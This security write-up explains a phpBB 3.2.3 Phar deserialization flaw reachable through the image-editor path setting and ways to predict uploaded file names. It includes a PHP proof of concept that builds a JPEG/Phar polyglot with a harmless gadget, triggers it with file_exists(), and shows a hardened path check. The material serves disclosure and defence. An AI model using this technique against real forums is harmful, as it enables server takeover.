
Phpbb3











A video walkthrough of phpBB 3.2.3: Phar Deserialization to RCE

Technical Details

Phar deserialization vulnerabilities occur when user input is passed unsanitized to any file system function in PHP, such as file_exists(). We have detailed how this exploitation technique, discovered by Sam Thomas, works in our previous blog post.

The vulnerability in phpBB3 lies in a feature that allows administrators to edit images that were uploaded to the forum. The feature utilizes an image editor binary called Imagick. Administrators are able to set the absolute path to the image editor binary on the server running phpBB3. Before updating this setting, phpBB3 tries to validate the new path with the function validate_config_vars(). The function performs this validation by checking whether the file actually exists.

includes/functions_acp.php (excerpt; the array indices on the sprintf() line were lost when the page was extracted)
function validate_config_vars($config_vars, &$cfg_array, &$error)
...
$error = sprintf($user->lang, $cfg_array)

For exploitation, the following steps are necessary. Please note that we left out some details on purpose.

In order to trigger the Phar deserialization, the local path to the Phar file on the target server must be supplied.

Example of triggering a Phar deserialization:
file_exists('phar:///var/www/phpBB3/files/evil.phar')

This means an attacker must upload the malicious Phar file to the target board. Since phpBB3 allows users to upload attachments and add them to threads and posts, uploading the malicious Phar file is trivial. Although only a whitelisted set of extensions, such as .pdf, is allowed, an attacker can still upload a valid Phar file to the server. This is because Phar files are extension independent: the phar:// stream wrapper parses the archive regardless of the file's name. If evil.phar were renamed to evil.jpg, the above example of triggering the Phar deserialization would still work.

Phar files are extension independent:
file_exists('phar:///var/www/phpBB3/files/evil.jpg')

There are also polyglot files that are valid JPG and Phar files at the same time.

Defeating filename randomization

When files are uploaded to the phpBB3 forum (e.g. post attachments or images), their filename is randomized. When evil.jpg is uploaded, it is stored in the /phpBB3/files/ directory under a randomly generated MD5 hash, for example 2_08cc076da659b5b30de5fbfe10c05270. In order to exploit the Phar deserialization, an attacker must know the exact path of the file on the server. The filename randomization of phpBB3 is cryptographically secure, so brute-forcing the filename is not a viable option. This means that the first step, uploading the malicious file, can be done easily, but the second step, triggering the Phar deserialization, fails because the attacker does not know the path to the Phar file.

However, a weakness in the file upload process for attachments allows attackers to predict the filename on the server. phpBB3 allows users to upload files in chunks, which means that a large file can be uploaded in multiple requests. All upload chunks are written to a temporary file. The temporary filename is generated by the temporary_filepath() function. Once all chunks have been appended to the file, its filename is randomized and it is moved to the /phpBB3/files directory.
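The following is an added example, not code from phpBB3 or from the original post. It ties together the three points above: a Phar archive carries a serialized object in its metadata, the archive stays a valid Phar after being renamed to a whitelisted extension (here with a JPEG header in front of the stub, the polyglot idea), and a plain file_exists() on a phar:// path is enough to unserialize that object. The LogWriter gadget, the file names under the system temp directory and the hardenedCheck() function are assumptions made for illustration; the real gadget chain used against phpBB3 is not shown. Writing a Phar requires running with phar.readonly=0, and the automatic unserialization on open only happens on PHP 7.x (PHP 8.0 changed the phar wrapper to unserialize metadata on demand), so the marker file only appears on PHP 7.

```php
<?php
// Added example, not phpBB3 or RIPS code. A Phar whose metadata is a serialized
// object, renamed to a whitelisted extension with a JPEG header in front of the
// stub (polyglot), is triggered by a plain file_exists() on a phar:// path.
// LogWriter is a hypothetical stand-in gadget; the chain used against phpBB3 is
// not part of this example.
// Run with: php -d phar.readonly=0 phar_demo.php
// On PHP 8.0+ the phar wrapper no longer unserializes metadata on open, so the
// marker file is only written by PHP 7.x.

class LogWriter
{
    public $file = '';
    public $data = '';

    // __wakeup runs inside unserialize(), i.e. while file_exists() parses the
    // manifest; a __destruct gadget would fire later, when the archive is released.
    public function __wakeup()
    {
        file_put_contents($this->file, $this->data, FILE_APPEND);
    }
}

$dir    = sys_get_temp_dir();
$marker = $dir . '/phar_demo_marker.txt';   // assumed scratch path
@unlink($marker);

// 1. Build the Phar. Arbitrary bytes may precede the stub as long as it ends with
//    __HALT_COMPILER(); so a JPEG SOI/APP0 header turns it into a JPG/Phar polyglot.
$pharPath = $dir . '/evil.phar';
@unlink($pharPath);
$phar = new Phar($pharPath);
$phar->startBuffering();
$phar->addFromString('dummy.txt', 'x');       // a Phar needs at least one entry
$phar->setStub("\xFF\xD8\xFF\xE0" . str_repeat("\x00", 12) . '<?php __HALT_COMPILER(); ?>');
$gadget       = new LogWriter();
$gadget->file = $marker;
$gadget->data = "unserialized by file_exists()\n";
$phar->setMetadata($gadget);                  // stored serialize()d in the manifest
$phar->stopBuffering();
unset($phar);

// 2. Give it a whitelisted extension: phar:// does not look at the file name.
$jpgPath = $dir . '/evil.jpg';
rename($pharPath, $jpgPath);

// 3. Vulnerable pattern: "does this path exist?" on attacker-controlled input.
function vulnerableCheck(string $path): bool
{
    return file_exists($path);                // opens the archive, unserializes metadata
}

// 4. Hardened variant (assumed mitigation): refuse any stream wrapper before
//    touching the filesystem, then require a plain absolute local path.
function hardenedCheck(string $path): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return false;                         // phar://, data://, ... are not local files
    }
    return $path !== '' && $path[0] === '/' && file_exists($path);
}

$attackerPath = 'phar://' . $jpgPath;

echo 'vulnerableCheck: ', var_export(vulnerableCheck($attackerPath), true), PHP_EOL;
echo 'marker written:  ', var_export(file_exists($marker), true), PHP_EOL;

@unlink($marker);
echo 'hardenedCheck:   ', var_export(hardenedCheck($attackerPath), true), PHP_EOL;
echo 'marker written:  ', var_export(file_exists($marker), true), PHP_EOL;

@unlink($jpgPath);
```

The hardened check mirrors the class of fix the vulnerable validate_config_vars() needed: the setting is documented as an absolute path to a binary, so anything carrying a scheme is rejected before any filesystem function sees it. Note that is_file(), filesize(), realpath()-free checks and most other stat-style functions open the phar:// archive exactly like file_exists() does, so swapping the function is not a fix.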
